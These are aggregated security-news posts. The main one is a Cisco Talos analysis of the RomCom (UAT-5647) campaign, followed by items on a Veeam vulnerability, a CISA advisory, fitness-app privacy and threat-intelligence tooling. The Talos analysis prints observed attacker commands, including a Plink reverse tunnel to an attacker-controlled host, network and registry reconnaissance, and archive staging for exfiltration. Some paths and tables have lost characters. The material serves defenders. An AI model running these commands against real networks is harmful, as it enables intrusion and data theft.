UAT-5647 targets Ukrainian and Polish entities with RomCom malware variants

By Dmytro Korzhevin, Asheer Malhotra, Vanja Svajcer and Vitor Ventura. 

Cisco Talos has observed a new wave of attacks active since at least late 2023, from a Russian speaking group we track as “UAT-5647”, against Ukrainian government entities and unknown Polish entities. UAT-5647 is also known as  RomCom and is widely attributed to Russian speaking threat actors in open-source reporting.  The latest series of attacks deploys an updated version of the RomCom malware we track as “SingleCamper”. This version is loaded directly from registry into memory and uses loopback address to communicate with its loader.UAT-5647 has also evolved their tooling to include four distinct malware families: two downloaders we track as RustClaw and MeltingClaw; a RUST-based backdoor we call DustyHammock; and a C++ based backdoor we call ShadyHammock.During its lateral movement, the threat actor attempted to compromise edge devices by tunneling internal interfaces to external, remote hosts controlled by UAT-5647. If successful, it would have higher chances of evading detection during the incident response process. 

UAT-5647 has long been considered a multi-motivational threat actor performing both ransomware and espionage-oriented attacks. However, UAT-5647 has accelerated their attacks in recent months with a clear focus on establishing long–term access for exfiltrating data of strategic interest to them. Our assessment, in line with recent reporting from CERT-UA and Palo Alto Networks, indicates that the threat actor is aggressively expanding their tooling and infrastructure to support a wide variety of malware components authored in diverse languages and platforms such as GoLang, C++, RUST and LUA.  

Talos further assesses that this specific series of attacks, targeting high profile Ukrainian entities, is likely meant to serve UAT-5647’s two-pronged strategy in a staged manner – establish long-term access and exfiltrate data for as long as possible to support espionage motives, and then potentially pivot to ransomware deployment to disrupt and likely financially gain from the compromise. It is also likely that Polish entities were also targeted, based on the keyboard language checks performed by the malware.

UAT-5647 infection chain 

The infection chain consists of a spear-phishing message delivering a downloader consisting of either of two variants: “RustyClaw” – a RUST-based downloader, and a C++ based variant we track as “MeltingClaw”. The downloaders make way for and establish persistence for two distinct backdoors we call “DustyHammock” and “ShadyHammock,” respectively.  

DustyHammock is a more straightforward backdoor meant to be the core malicious component of the infection communicating with its command and control (C2) and performing malicious actions. ShadyHammock is, however, a two-pronged backdoor responsible for loading and activating the SingleCamper implant (RomCom malware variant) on an infected system and optionally listening for incoming commands from another malicious component. 

The overall infection chain can be visualized as: 


UAT-5647’s post-compromise activity 

The post-compromise activity by UAT-5647 is standard to what we would expect for a threat actor whose primary motivation is espionage. There is however one set of actions that stand out. It is our assessment that at some point the threat actor started targeting the edge devices, from inside the compromised network. This and other activities are detailed in the following sub-sections. 

Tunneling into the enterprise 

Once preliminary network reconnaissance was completed, UAT-5647 downloaded PuTTY’s Plink tool to establish remote tunnels between accessible endpoints and attacker-controlled servers [T1572]. While this is a common practice, one of the configurations was mapping the internal admin port of an edge device.

cmd /C %public%picturesiestatus[.]exe -pw _passwd_ -batch -hostkey SHA256:_KEY_ -N -R 8080:_IP_IN_INFECTED_NETWORK_:80 root@_ATTACKERS_REMOTE_IP_ -P 7722

Any traffic sent to Port 8088 on the attacker-controlled remote server will be forwarded to Port 80 on (<IP_IN_INFECTED_NETWORK>). This technique effectively exposes the application on Port 80 to the attackers allowing them to: 

Brute force or password spray to gain access to the service. Monitor and exfiltrate data and configuration from the application once access has been achieved. 

Based on URLs exposed to the threat actors now on Port 8088 such as “hxxp[://]193[.]42[.]36[.]131:8088/help/LanArpBindingListHelpRpm[.]htm”, “userRpm/VirtualServerRpm.htm”, and Censys data, it is likely that the <IP_IN_INFECTED_NETWORK> IP address is a “TP-LINK Wireless G Router WR340G”.

UAT-5647’s lateral movement and system discovery 

The threat actors were particularly interested in network reconnaissance, evident from the repeated ping sweeps they carried out to find adjoining systems [T1016]: 

powershell command 1..254 | % {ping n 1 a w 100 192.168.0.$_} | SelectString [

Once UAT-5647 deemed a specific system on the network as interesting, they can take one of two actions: 

Based on the results of the ping sweep (ICMP sweep), UAT-5647 created and executed a customized batch (BAT) file named “nv[.]bat”. The BAT file is used to run “net view” to obtain a list of shares exposed on specific IPs [T1135]:  

net view /all [][]192[.]168[.]XXX[.]XXX
net view /all [][]192[.]168[.]XXX[.]XXX
net view /all [][]192[.]168[.]XXX[.]XXX
net view /all [][]192[.]168[.]XXX[.]XXX

UAT-5647 further pinged additional endpoints in the network, this time however using their hostnames and specific IPs [T1016]: 

ping -n 1 <IP>
ping -n 1 <hostname>

A successful response from the system leads to shared folder reconnaissance [T1135]: 

dir [][]192[.]168[.]0[.]XXXc$
dir [][]<hostname>c$

They began to run highly specific port scans on it, likely to find means of obtaining unauthorized access to it: 

powershell -c $ips = @(“<IP_ADDRESS>”); $ports = @(“22”, “80”, “443”); foreach ($ip in $ips) { foreach ($port in $ports) { if ((New-Object Net[.]Sockets[.]TcpClient)[.]Connect($ip, $port)) { “$[OPEN] $ip $port” | Out-File -Append “c:userspublicmusiclog[.]txt” } } }

Later the threat actor expanded their port scans to other IP address in the network: 

powershell -Command $ips = @(” <IP_ADDRESS>”, “<IP_ADDRESS>”, …., “<IP_ADDRESS>”, “<IP_ADDRESS>”); $ports = @(“22”, “80”, “443”, “445”); $output = “c:userspublicmusiclog[.]txt”; foreach ($ip in $ips) { foreach ($port in $ports) { $result = Test-NetConnection -ComputerName $ip Port $port; “$ip $port : $($result[.]TcpTestSucceeded)” | OutFile Append $output } }

System and user discovery 

Even though the C2 may have automatically issued a limited set of commands to the last-stage implants, the attackers open a reverse shell (via cmd[.]exe) to conduct further reconnaissance. This activity primarily consists of user and system discovery tasks:


MITRE ATT&CK Technique 



whoami /all 


System Owner/User Discovery [T1003] 





System Location Discovery: System Language Discovery [T1614/001] 



ipconfig /all 

powershell -c get-volume 


arp -a 

net user 

tasklist /v 

netstat –ano 




System Information Discovery [T1082] 


nltest /domain_trusts 



Domain Trust Discovery [T1482] 


dir C:Program Files 

dir C:Users 

dir %userprofile% 

dir %userprofile%Downloads 

dir %userprofile%Desktop 

dir %userprofile%Documents 

dir %localappdata% 

dir /s C:ProgramData 

dir %LOCALAPPDATA%GoogleChromeUser DataDefault 

dir %localappdata% 

dir c:users 

dir %public% 






File and Directory Discovery [T1083] 

net localgroup 

net localgroup administrators 

net share 


Permission Groups Discovery: Local Groups [T1069/001] 


cmd /C reg export hkcu %public%musichkcu.txt 

cmd /C reg export hklm %public%pictureshklm.txt 

cmd /C reg query hklmsoftware 

cmd /C reg query hklmsoftware<product_name> 

cmd /C reg query hklmSYSTEMCurrentControlSetServices <product_name> /s 


Query Registry [T1012] 

Data exfiltration activity 

In parallel, we also observed the operators attempting to stage entire drives for exfiltration from the infected system [T1560]: 

powershell -c Compress-Archive -Path d: -DestinationPath C:Users<user>

However, they also collected specific folders on disk too. In this specific case the threat actor is exfiltrating the “Recent” folder in, what seems, an attempt to understand the victim’s latest activity on the system. 

cmd /C powershell -c Compress-Archive -Path c:users<users>appdataRoamingmicrosoftWindowsRecent -DestinationPath

RustyClaw leads to DustyHammock 

RustyClaw is a RUST-based malware downloader that is targeted towards Polish, Ukrainian or Russian speaking users. The malware checks the Keyboard Layout to match one of the following language codes, before proceeding with its malicious activities: 

415 – Polish 422 – Ukrainian 419 – Russian 2000 – Unknown 


RustyClaw will then generate a hash for its file name to match it with a hardcoded value – this is an anti-analysis feature to prevent malware from running in sandboxes with randomized names. 

Once the checks have passed, the downloader will optionally download a decoy PDF to display to the infected user and then download the next-stage implant, DustyHammock, to locations on disk such as: 


Then the following registry values are set to the path of the next-stage payload (keyprov[.]dll): 


This GUID is the CLISD for “CLSID_LocalIconCache”, that is the ThumbCache entry. It is used by explorer[.]exe while rendering the thumbnails for file icons. 

The downloader will then restart the explorer[.]exe process to load the next-stage payload DLL, DustyHammock, effectively trojanizing the process: 

cmd /C timeout 3 && taskkill /f /im explorer.exe && start explorer.exe 

DustyHammock – UAT-5647’s latest backdoor 

DustyHammock is another RUST-based backdoor. It is configured to run preliminary, hardcoded, reconnaissance commands on the infected system, gather their outputs, and send the information to its C2. The C2 then begins responding with tasks to perform on the infected system. The preliminary information collected is the MAC addresses, windows version information, and computerusername via the “whoami” and “chcp” commands. 

The backdoor has the following capabilities: 

Run arbitrary commands on the infected endpoint. Download and place files from the C2 to the infected system. Connect to an IPNS CID – likely done to download additional payloads to the infected system. The CID access by the backdoor is “/ipns/k51qzi5uqu5dgn9wgsaxb7cfvinmk27eusoufaxrp8qd1ri5kamf41bg7gpydm”. 

InterPlanetary File System (IPFS) is a peer-to-peer network allowing resource hosting in a decentralized manner. InterPlanetary Name System (IPNS), a feature of IPFS, enables mutable referencing of resources hosted on IPFS networks, allowing uploaders to modify the content of the resource without changing its identifier (CID). 

 Note that although similar in names, DustyHammock and ShadyHammock are in fact distinct implant families. ShadyHammock is coded in C++ and contains additional capabilities to bind itself and listen for incoming requests – a capability missing in DustyHammock. Although ShadyHammock consists of more features, DustyHammock seems to be the successor to it and was used as recently as September 2024 by UAT-5647. UAT-5647 likely decided to abandon additional components such as SingleCamper (loaded by ShadyHammock) in favor of a single last-stage implant, DustyHammock. 

MeltingClaw leads to ShadyHammock 

MeltingClaw is the second malware downloader UAT-5647 has used in this series of attacks. It is similar in behavior to RustyClaw with varying configurations such as file names and locations. The next-stage payload, ShadyHammock, is dropped to a similar location such as: 



This DLL is loaded into explorer[.]exe by specifying it in the registry key: 


This GUID is the “Sync Registration” COM interface and is loaded into explorer[.]exe as well. 

 Apart from these capabilities that are common with RustyClaw, MeltingClaw will also download and store additional payloads in the Windows registry: 



Registry Value Names 

Purpose and contents 



XOR encoded SingleCamper DLL 



XOR encoded malware DLL – currently unknow. 



The implant version for the downloader. 


These payloads are then loaded and activated by ShadyHammock via explorer[.]exe as illustrated next. One of the payloads is a new variant of the RomCom backdoor, we track as “SingleCamper”. The other payload is currently unknown. 

ShadyHammock – a two-pronged backdoor 

ShadyHammock is a simple and effective backdoor that carries out two primary tasks: 

Load and run payloads placed in certain registry locations (by its parent MeltingClaw). Bind to localhost and listen for incoming commands from a separate malicious component. 


ShadyHammock’s load-and-run capability leads to SingleCamper 

The malware will read registry locations, specifically in location: 


There are usually three values in this registry key, two containing encoded copies of next stage payloads and the third containing configuration specific data such as the implant’s versions. 

The binary content of these registry values is read and decoded, resulting in a DLL that is simply traversed to find the export function. The resulting DLLs are loaded into memory to carry out more malicious activities. So far Talos has only discovered one DLL-based payload from registry, that we track as “SingleCamper”. SingleCamper, a new version of the RomCom malware, was also recently disclosed in Palo Alto’s report as SnipBot.  

The other payload is yet to be discovered (usually in the “trem2” or “state2” registry values). However, ShadyHammock already has the capability to deploy this payload on-demand provided that a specific command code is sent to it via the endpoint’s localhost interface. 


ShadyHammock can accept commands from SingleCamper 

ShadyHammock also consists of the ability to bind to a specific port (such as 1342) on localhost (127[.]0[.]0[.]1). Binding to localhost does not allow it to listen for incoming requests from remote hosts and is a mechanism to communicate with SingleCamper. 



ShadyHammock listening on Port 1342 


ShadyHammock will listen for specific command phrases based on which it performs specific actions. These actions consist of: 

delete bot”: Issuing this command will result in the backdoor being deleted from the infected host. The backdoor will delete all registry keys and folders associated with it and then restart explorer[.]exe to execute a benign, non-trojanized copy of the process. “update bot work” or “start bot file”: these commands instruct the backdoor to decode and load the payload stored in the second registry value that may have been created by MeltingClaw – “trem2” or “state2”. 

These commands are in fact issued to ShadyHammock by SingleCamper (RomCom). SingleCamper’s C2 server will issue a specific command code to it based on which the malware will generate the command phrase such as “delete bot” and send it to ShadyHammock via the localhost interface. 


SingleCamper issuing commands to ShadyHammock via localhost 


SingleCamper – an update to RomCom 

SingleCamper is the key implant in this infection that carries out all of the malicious post-compromise activities. It is loaded by ShadyHammock after being read and decoded from the Windows registry. 

SingleCamper consists of the following capabilities: 

Send preliminary system information to the C2 for registering the infection. The data is sent over Port 443  (HTTPS) in format: 


Execute preliminary reconnaissance commands sent by the C2 and respond with the results such as: nltest /domain_trusts systeminfo ipconfig /all dir C:”program Files” C:”Program Files (x86)” C:Users 


Based on the information received by the C2, the attackers decided whether the infected system is worth exploring further and carrying out post-compromise activities. Therefore, any commands executed by SingleCamper after these preliminary commands may be human operator issued commands. 

Receive command codes and accompanying data from the C2 and perform malicious actions on the infected system such as system information, download of additional payloads (such as PuTTY’s Plink), enumerate processes, enumerate and exfiltrate files with specific extensions such as: txt, rtf, xls, xlsx, ods, cmd, pdf, vbs, ps1, one, kdb, kdbx, doc, docx, odt, eml, msg, email. 

SingleCamper can also send commands to its loader, ShadyHammock, to perform actions on the infected endpoint. Actions include deleting the infection and loading another payload from registry – the same way ShadyHammock loads SingleCamper. 



Ways our customers can detect and block this threat are listed below. 



 Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.  

 Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.  

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.  

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.  

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.  

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.  

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.  

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.  

 Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.  

 Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on  






IOCs for this research can also be found at our GitHub repository here








PuTTY Plink 













Network IOCs 


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Critical Vulnerability in Veeam Products Exploited by Ransomware Gangs

Key Takeaways

A critical vulnerability, CVE-2024-40711, was discovered in Veeam Backup & Replication, allowing unauthenticated remote code execution.

CVE-2024-40711 has a CVSS score of 9.8, indicating an urgent need for remediation due to its severity.

 Threat actors are actively exploiting this vulnerability to deploy Akira and Fog ransomware.

Veeam issued security updates to address these vulnerabilities in early September 2024.

Multiple Veeam products were also affected by different vulnerabilities, including Veeam Backup & Replication, Veeam ONE, and Veeam Agent for Linux, among others.

Organizations are urged to implement regular update protocols, enhance monitoring, and develop incident response plans to mitigate risks.


Threat actors have exploited a recent critical vulnerability in Veeam Backup & Replication to deploy Akira and Fog ransomware. This vulnerability, designated as CVE-2024-40711, is rated 9.8 out of 10.0 on the Common Vulnerability Scoring System (CVSS) scale, highlighting its severe nature. Veeam addressed this security flaw in version 12.2 of Backup & Replication, released in early September 2024.

Florian Hauser, a security researcher with CODE WHITE based in Germany, discovered the vulnerability and reported it to Veeam. Hauser emphasized the urgency of patching systems, stating, “Better patch your Veeam Backup & Replication servers! Full system takeover via CVE-2024-40711, discovered by our very own @frycos—no technical details from us this time because this might instantly be abused by ransomware gangs.”

The exploitation of this vulnerability has raised security concerns. In a recent attack linked to the Fog ransomware, threat actors managed to deploy the ransomware on an unprotected Hyper-V server. During the same operation, they utilized the rclone utility to exfiltrate sensitive data.

However, other attempts to deploy ransomware were reportedly unsuccessful. Attempted exploits picked up by Sophos endpoint detection all used compromised VPN gateways lacking multifactor authentication (MFA) to exploit Veeam on the widely exposed port 8000, triggering the Veeam.Backup.MountService.exe to launch net.exe. The exploit creates a local account, “point,” and adds it to the local Administrators and Remote Desktop Users groups.

Timely Patches and Advisory

Veeam took prompt action by disclosing the vulnerability and releasing security updates on September 4, 2024. Following this, watchTowr Labs published a technical analysis of the vulnerabilities on September 9, 2024.

Notably, they delayed the publication of proof-of-concept exploit code until September 15, 2024, to give administrators adequate time to secure their systems. Given its widespread use, Veeam’s products are a prime target for malicious actors looking for quick access to backup data, emphasizing the need for timely remediation.

Moreover, according to an advisory from Cyble, CVE-2024-40711 is just one of several vulnerabilities that affected Veeam products. The Cyble advisory released a summary of the latest vulnerabilities and patches from various vendors, focusing on the following CVEs linked to Veeam:

CVE-2024-40711: Critical, CVSS score 9.8, allowing unauthenticated remote code execution.

CVE-2024-40713: High severity.

CVE-2024-40710: High severity.

CVE-2024-39718: Medium severity.

CVE-2024-40714: High severity.

CVE-2024-40712: Medium severity.

CVE-2024-40709: Medium severity.

CVE-2024-42024: Medium severity.

CVE-2024-42019: Medium severity.

CVE-2024-42023: Medium severity.

CVE-2024-42021: Medium severity.

CVE-2024-42022: Medium severity.

CVE-2024-42020: Medium severity.

CVE-2024-38650: Medium severity.

CVE-2024-39714: Medium severity.

CVE-2024-39715: Medium severity.

CVE-2024-38651: Medium severity.

CVE-2024-40718: Medium severity.

The vulnerabilities primarily impact several Veeam products, posing significant security risks. Among these is Veeam Backup & Replication, which is widely used for data protection and disaster recovery. Additionally, the Veeam Agent for Linux is affected, as well as Veeam ONE, which provides monitoring and analytics for backup operations.

Furthermore, the Veeam Service Provider Console is included in the list of vulnerable products, along with Veeam Backup for Nutanix AHV. Lastly, Veeam Backup for Oracle Linux Virtualization Manager and Red Hat Virtualization also face these security concerns. Organizations utilizing any of these products should take immediate action to secure their systems against potential exploitation. 

Technical Details of CVE-2024-40711

CVE-2024-40711 is classified as a remote code execution vulnerability, allowing unauthenticated attackers to send a malicious payload that can lead to a complete system takeover. The affected software versions include Veeam Backup & Replication and all earlier versions.

During an investigation, Cyble’s ODIN scanner identified approximately 2,466 internet-exposed instances of Veeam Backup, predominantly in the United States. 

The CVE-2024-40711 vulnerability is not an isolated incident. On March 7, 2023, Veeam patched another high-severity vulnerability, CVE-2023-27532, which was exploited in attacks linked to the financially motivated FIN7 threat group, notorious for its connections to various ransomware operations including Conti, REvil, Maze, Egregor, and BlackBasta. 

Recommendations and Mitigations

Here are several mitigation and recommendation strategies for addressing the vulnerabilities in Veeam products:

Ensure that the latest patches released by Veeam are implemented immediately to address the critical vulnerabilities.

Create a routine schedule for regular updates across all Veeam products to maintain security and compliance.

Regularly perform security assessments and audits to identify and remediate potential vulnerabilities in your systems.

Isolate Veeam products from the internet wherever possible to reduce the attack surface and minimize exposure to potential threats.

Enforce MFA for accessing Veeam management interfaces to add an additional layer of security against unauthorized access.

Utilize comprehensive monitoring tools to detect suspicious activities and potential exploitation attempts in real-time.

Establish and regularly update an incident response plan that includes procedures for identifying, responding to, and recovering from security incidents.

Assess any third-party tools or integrations used with Veeam products to ensure they do not introduce additional vulnerabilities.


Veeam’s products, used by over 550,000 customers globally, including 74% of the Global 2000 companies, represent a dangerous risk if not properly secured. Organizations relying on Veeam’s Backup & Replication solutions must act swiftly to apply the necessary patches and protect their defenses against potential ransomware attacks. 

The post Critical Vulnerability in Veeam Products Exploited by Ransomware Gangs appeared first on Cyble.

Blog – Cyble – ​Read More

Protecting major events: An incident response blueprint

Ensuring the cybersecurity of major events — whether it’s sports, professional conferences, expos, inter-government meetings or other gatherings — is a complex and time-intensive task.  

It requires a comprehensive approach and collaboration among various stakeholders, including vendors, hospitality teams, and service providers, to establish a consistent cybersecurity strategy across the entire event ecosystem. 

In our latest version of the “Protecting major events: An incident response blueprint” whitepaper, Cisco Talos Incident Response outlines the essential steps organizations should take to secure any major event. This paper highlights 13 critical focus areas that will guide organizing committees and participating businesses, offering key questions and actionable answers to help ensure robust event security. 

Cisco Talos Blog – ​Read More

CISA Issues Urgent Advisory on Vulnerabilities Affecting Multiple Products


The Cybersecurity and Infrastructure Security Agency (CISA) has released a critical advisory report highlighting vulnerabilities recently added to the Known Exploited Vulnerability (KEV) catalog. These vulnerabilities pose risks to organizations and require immediate attention.

CISA categorizes vulnerabilities based on the Common Vulnerabilities and Exposures (CVE) naming standards and the Common Vulnerability Scoring System (CVSS). This system classifies vulnerabilities into high, medium, and low categories. High vulnerabilities are assigned scores ranging from 7.0 to 10.0; medium vulnerabilities receive scores between 4.0 and 6.9, and low vulnerabilities score between 0.0 and 3.9.

The advisory outlines specific vulnerabilities and the products they affect, including SolarWinds, Mozilla Firefox, and Microsoft Windows.

Vulnerability Details

One of the critical vulnerabilities identified is CVE-2024-28987, which affects the SolarWinds Web Help Desk (WHD) software, specifically version 12.8.3 HF1 and all earlier versions. This vulnerability is classified as critical, with a CVSS score of 9.1. It allows remote, unauthenticated users to access internal functionalities and modify data due to hardcoded credentials in the software.

Public proof-of-concept exploits for this vulnerability are readily available, highlighting its severity. According to Cyble’s ODIN scanner, approximately 920 internet-facing instances of SolarWinds WHD have been identified, primarily located in the United States.

Another vulnerability, CVE-2024-9680, affects multiple versions of Firefox and Thunderbird and has a critical CVSS score of 9.8. This vulnerability arises from a use-after-free flaw in Animation timelines, enabling an attacker to execute arbitrary code. Mozilla has acknowledged reports of this vulnerability being exploited in the wild, further emphasizing the need for immediate remediation.

The third vulnerability, CVE-2024-30088, impacts various Windows products, including Windows Server 2016 and multiple Windows 10 and 11 versions. It has a CVSS score of 7.0, classifying it as high severity. This vulnerability exploits a race condition within the Windows kernel, allowing attackers to gain SYSTEM privileges. Researchers from Trend Micro have reported observing the Advanced Persistent Threat (APT) group APT34 leveraging this vulnerability for privilege escalation in targeted systems.


Organizations should apply the latest patches from official vendors.

Establish a routine schedule for regularly updating all software and hardware systems.

Ensure critical updates are prioritized for immediate application to reduce exposure to exploits.

Isolate sensitive assets from less secure areas to minimize risk and reduce the attack surface.

Implement firewalls, Virtual Local Area Networks (VLANs), and access controls to limit threat exposure.

Develop and regularly update an incident response plan for detecting, responding to, and recovering from security incidents.

Conduct regular tests of the incident response plan to ensure its effectiveness against evolving threats.

Use comprehensive monitoring and logging solutions to detect and analyze suspicious activities across the network.

Utilize Security Information and Event Management (SIEM) systems for real-time threat detection and response by aggregating and correlating logs.

Proactively identify and plan for the timely upgrades or replacements of End-of-Life (EOL) products to mitigate associated risks.


The addition of these vulnerabilities to CISA’s KEV catalog highlights the urgent need for organizations to address them immediately. The fact that these vulnerabilities are actively exploited signifies that organizations with affected systems face heightened risks, including potential data breaches, ransomware attacks, and privilege escalation.

Organizations must promptly patch these vulnerabilities to safeguard their systems from malicious actors. By following these recommendations, organizations can significantly strengthen their cybersecurity and protect against critical vulnerabilities.

The post CISA Issues Urgent Advisory on Vulnerabilities Affecting Multiple Products appeared first on Cyble.

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Security and privacy settings in Nike Run Club | Kaspersky official blog

We’ve talked before about why it’s crucial to configure your privacy settings in fitness apps before you even start using them, and shared a detailed guide on general smartphone settings to minimize data risks.

The fact is, fitness tracking apps share your sensitive information — including your precise location. Strava in particular stands out, since it shares almost all your training data by default. We’ve already covered how to set privacy in Strava in detail.

Other running apps have fewer privacy settings than Strava — and they are stricter by default (at least for new users signing up now). Nevertheless, it’s worth reviewing these settings as well, as there are a few things you might want to turn off.

The app of the world’s largest sportswear manufacturer — Nike Run Club (available for both Android and iOS) — tucks its privacy settings away in a not-so-obvious place. Here’s how to find them: in the top left corner, tap the gray round icon with your initials. Then, tap Settings. In the window that opens, you won’t find some “Privacy” section; instead, the relevant settings are scattered throughout.

Where to find privacy settings in the Nike Run Club app

Firstly, make sure your profile isn’t public: to do this, tap Profile Visibility, and check where the tick mark is. The best choice from a privacy perspective would be Friends (social), or even better, Only Me (private).

Secondly, prevent Nike from selling your data for “personalized advertising”. To do this, go to Your Privacy Choices and turn on the Do Not Share My Information toggle switch.

Thirdly, prevent Nike itself from using your data for internal purposes. To do this, go to the innocuously named Workout Info section and turn off the Use My Workout Info toggle switch.

Don’t overlook these key Nike Run Club settings

You may also want to look at Notifications Preference, Friend Tagging, and Friend Leaderboard. And if at some point you decide to quit Nike Run Club altogether, don’t forget to delete your profile by tapping Delete Account at the bottom of the settings list.

Using other running apps to track your workouts? We’ve got you covered with privacy guides for:

adidas Running (formerly Runtastic)
ASICS Runkeeper

You can also find guides on setting up privacy in other apps — from social networks to browsers — on our website Privacy Checker.

And Kaspersky Premium will maximize your privacy and safeguard you from digital identity theft on all your devices.

Don’t forget to subscribe to our blog for more how-to guides and useful articles to always stay one step ahead of scammers.

Kaspersky official blog – ​Read More

Cyber Information Gathering: Techniques and Tools for Effective Threat Research 

To stay safe from cyber attacks, organizations need effective ways to gather information about threats before they cause irreparable damage. Let’s look at several methods for gathering threat intelligence (TI) to see how they can help you gain a better view of the current threat landscape. 

Why is Threat Intelligence Important? 

Threat intelligence is important for several reasons: 

Proactive Awareness: Knowing about potential threats helps organizations take steps to deal with them before they escalate. 

Quick Response: When an attack happens, having threat intelligence allows teams to respond faster and more effectively. 

Better Risk Management: Understanding vulnerabilities helps organizations prioritize where to focus their security efforts. 

How to Collect Cyber Threat Intelligence 

Gathering threat intelligence isn’t just about knowing where to look; it’s about understanding how to use those sources effectively. Let’s explore key methods for collecting threat intelligence, diving into the techniques and tools that can help cybersecurity professionals. 

Integrating Threat Intelligence Feeds 

Threat intelligence feeds provide real-time streams of data on malware, vulnerabilities, and emerging risks. By using these feeds, organizations can stay up-to-date with the latest threats and trends. To effectively gather intelligence: 

Automate Data Collection: Integrate feeds with your cybersecurity tools (like SIEM) for continuous monitoring. 

Correlate Information: Use multiple feeds to cross-reference threats and identify patterns. 

Customize for Relevance: Focus on feeds that provide the most pertinent information for your industry or organization’s needs. 

Using Threat Intelligence Portals 

Threat intelligence portals centralize data and allow for comprehensive threat analysis. ANY.RUN‘s TI Lookup is an example of a tool that helps with such analysis. Using TI Lookup, users can: 

Investigate Indicators: Enter suspicious IP addresses, domains, or file hashes to gain insights into potential threats. 

Search for Known Threats: Use the portal to research malware, attack methods, or Indicators of Compromise (IOCs). 

Analyze Attack Techniques: The tool can also be used to link threats to known tactics and vice versa, such as those in the MITRE ATT&CK framework, helping users understand the nature of the threats they face. 

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to see how they can help you achieve better threat visibility.

Monitoring Dark Web Forums 

The Dark Web is often a hub for cybercriminal activities. Monitoring these forums can yield valuable information about planned attacks, new exploit techniques, and stolen data. Key steps include: 

Forum Monitoring Tools: Use automated tools to track conversations on Dark Web forums, collecting insights into new attack vectors. 

Analyze Discussions: Gather intelligence on specific threat actors, potential targets, and trends emerging in cybercrime

By keeping an eye on dark web forums, organizations can stay aware of evolving threats before they escalate. 

Reviewing Publicly Available Reports 

Cybersecurity organizations regularly release reports and threat research that provide detailed analyses of recent attacks and vulnerabilities. These reports are invaluable for keeping up with emerging threats. To use them effectively: 

Review Reports for Trends: Look for trends in the attacks, methods, and vulnerabilities discussed. 

Implement Recommendations: Use insights from these reports to adjust security practices and defense strategies. 

Data Mining for Threat Intelligence 

Data mining is a powerful method for extracting useful intelligence from large datasets. It allows security teams to identify patterns and anomalies that indicate potential threats: 

Anomaly Detection: By analyzing network traffic and system logs, data mining techniques can reveal suspicious behavior that may indicate an attack in progress. 

Predictive Analytics: Historical data can be analyzed to predict future attack trends, helping organizations take preventative measures. 

Deploying Honeypots 

Honeypots are decoy systems set up to attract cybercriminals. These fake targets are used to observe attackers and gather intelligence on their tactics and methods. To use honeypots effectively: 

Simulate Real Systems: Honeypots should mimic genuine vulnerabilities to lure attackers. 

Gather Attack Data: Record all interactions with the honeypot to study the attackers’ methods, tools, and behaviors in a controlled environment. 

Honeypots provide invaluable insights into how attackers operate, enabling organizations to improve their defensive strategies based on real-world data. 

Crowdsourcing Threat Intelligence 

Collaboration is another valuable tool for collecting threat intelligence. Crowdsourcing allows organizations to benefit from the collective knowledge of the broader cybersecurity community: 

Threat Intelligence Sharing: Platforms like ISACs (Information Sharing and Analysis Centers) enable the exchange of threat data across industries.

Collaborative Investigations: Participating in shared investigations can help identify complex threats and provide faster, more accurate responses.

Threat Sample Databases: There sources like ANY.RUN’s Public submissions database, containing millions of public sandbox analyses of the latest malware and phishing samples.

Crowdsourcing creates a network of shared defense, helping organizations quickly identify emerging threats and stay updated on the latest attack vectors. 

How to Gather Cyber Threat Intelligence with TI Lookup

Gathering cyber threat intelligence involves utilizing various tools and techniques.

ANY.RUN’s TI Lookup simplifies this process by offering a centralized repository of millions of IOCs, extracted from ANY.RUN’s extensive database of interactive malware analysis sessions.

You can use over 40 search parameters to investigate search this database, turning isolated data points into a comprehensive understanding of persistent and emerging threats. 

Key Benefits of TI Lookup for researchers: 

Comprehensive Threat Data: Access detailed threat intelligence by analyzing processes, files, network traffic, and more. TI Lookup links related IOCs, helping you fully understand the scope and impact of an attack. 

Fast and Accurate Searches: With 2-second response time and 1,000 new entries daily, TI Lookup provides swift access to the latest threat intelligence. 

Seamless Integration: Whether using the web interface or API, TI Lookup integrates easily with your existing security tools like Splunk

By using ANY.RUN TI Lookup, your security team can efficiently investigate threats, reduce risks, and enhance your overall cybersecurity posture.  

Here are a few examples using ANY.RUN TI Lookup: 

Analyzing Destination IPs

You can enter a suspicious IP address into TI Lookup to see if it is linked to any threat. 

TI Lookup results related to a suspicious IP address

The tool will display details such as the IP’s location and any associated indicators, samples, and sandbox sessions, giving you crucial insights into potential risks. 

Threat Name Investigation 

You can also identify the latest samples of a known threat using its name. 

TI Lookup results related to the Lumma Stealer malware

You will receive detailed information about the threat, including its behavior and Indicators of Compromise. This helps in understanding how the threat operates. 

Identifying Threats via MITRE ATT&CK TTPs

ANY.RUN’s TI Lookup lets you search using specific tactics or techniques of the MITRE ATT&CK framework. 

TI Lookup results related to a specific TTP

The tool will show relevant examples of how these techniques are used in attacks, helping you understand their application in real-world scenarios. 

Using ANY.RUN TI Lookup, cybersecurity teams can efficiently gather threat intelligence, investigate malware behavior, and equip themselves with the knowledge needed to combat emerging threats. 

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Wrapping up 

Gathering cyber threat intelligence is essential for understanding and combating cyber threats. By using various sources like threat intelligence feeds, dark web forums, publicly available reports, and tools like ANY.RUN TI Lookup, organizations can improve their awareness of potential risks. Being informed about these threats is a key part of a strong cybersecurity strategy. 

About ANY.RUN     

ANY.RUN helps more than 500,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI Lookup, YARA Search and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.

Request free trial of ANY.RUN’s products →

